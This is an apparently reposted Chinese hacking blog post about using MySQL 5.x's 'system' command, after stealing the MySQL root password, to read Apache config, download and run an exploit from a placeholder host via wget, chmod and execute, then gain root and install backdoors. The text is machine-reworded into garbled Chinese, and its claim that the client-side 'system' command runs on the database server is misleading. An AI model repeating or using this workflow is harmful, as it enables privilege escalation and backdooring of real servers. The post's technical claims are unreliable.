linux下mysql 5.x得到root暗码后的别的一种使用方法脚本之家huabian - 众发娱乐

linux下mysql 5.x得到root暗码后的别的一种使用方法脚本之家huabian

2018-09-10 07:36:59 | 作者: 飞昂 | 标签: 函数,途径,工作 | 浏览: 7776

Author: Sh@dow
刚才在卫生间蹲着的时分遽然想到这个问题,mysql5.x for linux下面有一个函数,能够协助咱们干许多工作,这个函数4。x下面形似没,本来一向没发现,也没去查函数手册,就我自己的经历来写点东西。4,x的明日再看看函数手册,再装一个试验一下。mysql 5.x里边引入了一个system函数,这个函数能够履行体系指令,当mysql以root登陆的时分,就能够使用这个函数履行指令,当然是在权限答应的范围内。
一般咱们依照惯例思路,搞到mysql的root暗码之后,咱们都会衔接上去,创立一个表,然后outfile,搞到一个webshell ,然后提权如此这般。今日咱们换一种办法。
依照上面的办法,咱们需求知道web的绝对途径,当然这个很不好找,有些有sqlinjection的,或许报错会显示出来,有的就不必定了。可是依照我的的办法,没有必要再去找web途径了,直接履行
mysql>system vi /etc/httpd/conf/httpd.conf;
mysql>system vi /etc/httpd/conf/httpd.conf;
直接这样就能够找到web的途径,当然,咱们的意图并不是找web途径,放webshell进去。咱们是要来做其他的工作,比方,下载exp履行,搞到root权限,然后装后门虾米的
mysql>system wget https://xxxx.xxx.com/xxxx
mysql>system chmod x xxxx;
mysql>system ./xxxx;
mysql>system wget https://xxxx.xxx.com/xxxx mysql>system chmod x xxxx;mysql>system ./xxxx;
这样mysql的root此刻就成为system的root了,剩余的工作,假设开了ssh,就ssh上去,输入mysql的用户暗码,ok,搞定。
或许,直接提权之后,下载后门装置,这个就留给我们去研讨了。
版权声明
本文来源于网络,版权归原作者所有,其内容与观点不代表众发娱乐立场。转载文章仅为传播更有价值的信息,如采编人员采编有误或者版权原因,请与我们联系,我们核实后立即修改或删除。

猜您喜欢的文章